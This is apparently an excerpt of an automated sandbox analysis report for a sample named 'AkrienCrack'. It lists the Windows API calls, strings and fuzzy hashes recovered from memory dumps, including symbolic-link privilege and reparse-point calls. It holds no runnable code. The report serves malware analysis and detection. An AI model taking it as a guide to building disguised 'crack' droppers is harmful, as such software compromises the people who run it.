                • Part of subcall function 00B47BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B47C04
                • Part of subcall function 00B47BF5: GetLastError.KERNEL32 ref: 00B47C4A
                • Part of subcall function 00B47BF5: CloseHandle.KERNEL32(?), ref: 00B47C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00B4730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B4741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00B47446
              • CloseHandle.KERNEL32(?), ref: 00B47457
              • GetLastError.KERNEL32 ref: 00B47467
              • RemoveDirectoryW.KERNEL32(?), ref: 00B474B3
              • DeleteFileW.KERNEL32(?), ref: 00B474DB
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: 3597c25d03291517b1fff20883178d2c53ffe6920a8ab9b6828c9a69c10ed0b5
              • Instruction ID: 4e1aef8e836efe0c27c2b60bd1fb4620d95d881c4fd9a460ec2ec5d9f45dfd4c
              • Opcode Fuzzy Hash: 3597c25d03291517b1fff20883178d2c53ffe6920a8ab9b6828c9a69c10ed0b5
              • Instruction Fuzzy Hash: 2FB1CD71904215AADB21DFA4CC85BEE77F8EF04700F0045E9F949E7242DB34AB89DBA1
              APIs
              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5A662
              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00B7E600,?,?), ref: 00B5A6B1
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FormatInfoLocaleNumber
              • String ID:
              • API String ID: 2169056816-0
              • Opcode ID: 55fcf7f94856544216895500f021a0a2c7bf7f8e010f5868eb1ed2ead3f2b2c6
              • Instruction ID: d46f9ff9d0df9270e9a2515a58cf0bfcdfa179bf4ba9ce58dcd4233e91076591
              • Opcode Fuzzy Hash: 55fcf7f94856544216895500f021a0a2c7bf7f8e010f5868eb1ed2ead3f2b2c6
              • Instruction Fuzzy Hash: 16015A36500209BADB10DFA4EC05FABB7FCEF19710F5144A2BA18A7160DB70DA648BA5
              APIs
              • GetVersionExW.KERNEL32(?), ref: 00B4AD1A
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Version
              • String ID:
              • API String ID: 1889659487-0
              • Opcode ID: f28d6cda3fc18770bf7be457325124dc6ad5c5972c0b3b71fd7ea363c3ecc1cc
              • Instruction ID: ae425ab9af8001cc361ecbc9addffa0c0980b064c4c4e43c253efa4d4b3b0108
              • Opcode Fuzzy Hash: f28d6cda3fc18770bf7be457325124dc6ad5c5972c0b3b71fd7ea363c3ecc1cc
              • Instruction Fuzzy Hash: 72F0F9B1D002188BC728DB18EC826E973E5FB58715F2042E5DA2943764DB70AA84DF51
              APIs
              • _swprintf.LIBCMT ref: 00B4DABE
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
                • Part of subcall function 00B51596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B80EE8,00000200,00B4D202,00000000,?,00000050,00B80EE8), ref: 00B515B3
              • _strlen.LIBCMT ref: 00B4DADF
              • SetDlgItemTextW.USER32(?,00B7E154,?), ref: 00B4DB3F
              • GetWindowRect.USER32(?,?), ref: 00B4DB79
              • GetClientRect.USER32(?,?), ref: 00B4DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 00B4DC25
              • GetWindowRect.USER32(?,?), ref: 00B4DC52
              • SetWindowTextW.USER32(?,?), ref: 00B4DC95
              • GetSystemMetrics.USER32(00000008), ref: 00B4DC9D
              • GetWindow.USER32(?,00000005), ref: 00B4DCA8
              • GetWindowRect.USER32(00000000,?), ref: 00B4DCD5
              • GetWindow.USER32(00000000,00000002), ref: 00B4DD47
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              • Opcode ID: 28f7040f01be47390ca01e15afe3907dbc937a21cac6688651084829f6837f2b
              • Instruction ID: eb70f4db5934590eecf8ce251278372f77ea7a510737630125833d0f1650e6e4
              • Opcode Fuzzy Hash: 28f7040f01be47390ca01e15afe3907dbc937a21cac6688651084829f6837f2b
              • Instruction Fuzzy Hash: FB81A072508301AFD710DF68CD89F6BBBE9EB89704F04496DFA84A3251D670E909CB52
              APIs
              • ___free_lconv_mon.LIBCMT ref: 00B6C277
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE2F
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE41
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE53
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE65
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE77
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE89
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE9B
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEAD
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEBF
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BED1
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEE3
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEF5
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BF07
              • _free.LIBCMT ref: 00B6C26C
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B6C28E
              • _free.LIBCMT ref: 00B6C2A3
              • _free.LIBCMT ref: 00B6C2AE
              • _free.LIBCMT ref: 00B6C2D0
              • _free.LIBCMT ref: 00B6C2E3
              • _free.LIBCMT ref: 00B6C2F1
              • _free.LIBCMT ref: 00B6C2FC
              • _free.LIBCMT ref: 00B6C334
              • _free.LIBCMT ref: 00B6C33B
              • _free.LIBCMT ref: 00B6C358
              • _free.LIBCMT ref: 00B6C370
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 36ef1ceeebe19757128159bf00324d6ff8c81a9af04bc302a7e60047c7e23322
              • Instruction ID: df145535a6c95380aff7ca19325adcc149fec417150635e89e25e0fb955bd09e
              • Opcode Fuzzy Hash: 36ef1ceeebe19757128159bf00324d6ff8c81a9af04bc302a7e60047c7e23322
              • Instruction Fuzzy Hash: 873181326003059FEB209A78D985B67BBEAFF00310F1485A9E499D7651DF39EC40CB64
              APIs
              • GetWindow.USER32(?,00000005), ref: 00B5CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 00B5CD7D
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B5CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B5CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B5CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B5CDED
              • DeleteObject.GDI32(00000000), ref: 00B5CDF4
              • GetWindow.USER32(00000000,00000002), ref: 00B5CDFD
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              • Opcode ID: 2fd6014dcd7e8e259ab3be72c8226bd64dc43ab2aa693feb02a4d192c9a7b37d
              • Instruction ID: 44c40a8f5d200d8637fc604ba608ac7fec6c559680be6d16d12e7a4d2d61b04f
              • Opcode Fuzzy Hash: 2fd6014dcd7e8e259ab3be72c8226bd64dc43ab2aa693feb02a4d192c9a7b37d
              • Instruction Fuzzy Hash: F511D532540310BFE6316B649C0BF9F3AEDEB56742F0044E0FE46E60E2CE64890E96A4
              APIs
              • _free.LIBCMT ref: 00B68EC5
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B68ED1
              • _free.LIBCMT ref: 00B68EDC
              • _free.LIBCMT ref: 00B68EE7
              • _free.LIBCMT ref: 00B68EF2
              • _free.LIBCMT ref: 00B68EFD
              • _free.LIBCMT ref: 00B68F08
              • _free.LIBCMT ref: 00B68F13
              • _free.LIBCMT ref: 00B68F1E
              • _free.LIBCMT ref: 00B68F2C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 736b2523e99c3f7d0efe6cc9431038c2cc0e5217b0b110508cf36a882e87d605
              • Instruction ID: 5da987401444a7a1d047398413a3280816c6df11dd21cc51ddb5781aed7b3fdc
              • Opcode Fuzzy Hash: 736b2523e99c3f7d0efe6cc9431038c2cc0e5217b0b110508cf36a882e87d605
              • Instruction Fuzzy Hash: 2B11A47650110DAFDB11EF54C882CDE7BA6FF04350B5182E5BA088B626DE35DA519B80
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              • Opcode ID: 079d329558e9e167ffdb354bacb3f3f718a058842d4c7f407ba2ef55c83374ff
              • Instruction ID: 7c5d43704659c5c31a7d4da0dbf8f3af3a40ec6454baf8d74193867c2821d1d9
              • Opcode Fuzzy Hash: 079d329558e9e167ffdb354bacb3f3f718a058842d4c7f407ba2ef55c83374ff
              • Instruction Fuzzy Hash: ECF123706042405BDB15EF2888D5BFE7BE5AF90700F4844F9FD858B286DB649E48F7A2
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B5AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B5AD60
              • SetWindowTextW.USER32(?,?), ref: 00B5AD71
              • GetDlgItem.USER32(?,00000065), ref: 00B5AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B5AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B5ADA4
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              • Opcode ID: e47db2278e18bfc11098dd20b5cf75b38c784fbb7ec92543678d9fccba3d0612
              • Instruction ID: 9cf1071ca0c3cc863e4e7c3a18f4d562d0e4fd85c009ff49d8f857a5988d87b0
              • Opcode Fuzzy Hash: e47db2278e18bfc11098dd20b5cf75b38c784fbb7ec92543678d9fccba3d0612
              • Instruction Fuzzy Hash: E921A032240204BBD2216F25ED4AF3B3EBCEB4AB47F0101A5FA45A34E1DE629905D632
              APIs
              • __EH_prolog.LIBCMT ref: 00B49448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B4946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B4948A
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              • _swprintf.LIBCMT ref: 00B49526
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • MoveFileW.KERNEL32(?,?), ref: 00B49595
              • MoveFileW.KERNEL32(?,?), ref: 00B495D5
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              • Opcode ID: 5aeb5d39ee06747d63271b732c875dfd8fa84c70fd9fd8d6e7e2e6878e28edb6
              • Instruction ID: 7bcd5ec53f88877af41145d7afdc75c7a471653c6826e15abd709128bdffb6f2
              • Opcode Fuzzy Hash: 5aeb5d39ee06747d63271b732c875dfd8fa84c70fd9fd8d6e7e2e6878e28edb6
              • Instruction Fuzzy Hash: E0414C71900258A6DF20EBA48C85EEF73FCEF55781F0444E5B949E3042EB748B89EB64
              APIs
              • __aulldiv.LIBCMT ref: 00B50A9D
                • Part of subcall function 00B4ACF5: GetVersionExW.KERNEL32(?), ref: 00B4AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B50AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B50AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B50AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B50B3D
              • __aullrem.LIBCMT ref: 00B50BCB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              • Opcode ID: 53b60715a27995b601602953d5f737860e7eed04b7afb502d9e3c5b703f60c8a
              • Instruction ID: d41a0c1c348f4b8a934f03614bf644738bed6b3fe5a04725c9b4f3612bb4911c
              • Opcode Fuzzy Hash: 53b60715a27995b601602953d5f737860e7eed04b7afb502d9e3c5b703f60c8a
              • Instruction Fuzzy Hash: CA4128B14083069FC314DF64C880A6BFBF8FB88715F004E6EF99692650E739E648DB52
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B6F5A2,?,00000000,?,00000000,00000000), ref: 00B6EE6F
              • __fassign.LIBCMT ref: 00B6EEEA
              • __fassign.LIBCMT ref: 00B6EF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B6EF2B
              • WriteFile.KERNEL32(?,?,00000000,00B6F5A2,00000000,?,?,?,?,?,?,?,?,?,00B6F5A2,?), ref: 00B6EF4A
              • WriteFile.KERNEL32(?,?,00000001,00B6F5A2,00000000,?,?,?,?,?,?,?,?,?,00B6F5A2,?), ref: 00B6EF83
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: 543d1814a22b8dbaf325ea89f63530ab8447db99a5c37389890c6e96c59e6f8f
              • Instruction ID: 4788aa7f31bf1207a254da23f0b89555a916ff4659e61852f89105e0065b500c
              • Opcode Fuzzy Hash: 543d1814a22b8dbaf325ea89f63530ab8447db99a5c37389890c6e96c59e6f8f
              • Instruction Fuzzy Hash: 1051D474A002099FDB10CFA8DC85BEEBBF9EF09710F14459AE965E7291D734E940CB60
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 00B5C54A
              • _swprintf.LIBCMT ref: 00B5C57E
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • SetDlgItemTextW.USER32(?,00000066,00B8946A), ref: 00B5C59E
              • _wcschr.LIBVCRUNTIME ref: 00B5C5D1
              • EndDialog.USER32(?,00000001), ref: 00B5C6B2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: ffc47a2f5dd5ca841eabde341ce5396e5f80ca37b8672af2862c41306a6f0af4
              • Instruction ID: aefea74a9fd3a7aa68b7d6afb8dae7df92b530e534ead1827de4c6908b793fa7
              • Opcode Fuzzy Hash: ffc47a2f5dd5ca841eabde341ce5396e5f80ca37b8672af2862c41306a6f0af4
              • Instruction Fuzzy Hash: D7416471900618AAEF26DB90DC45FEA7BFDEB04706F0440E6E909E7161EB719BC8CB50
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00B58F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B58F59
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AllocByteCharGlobalMultiWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
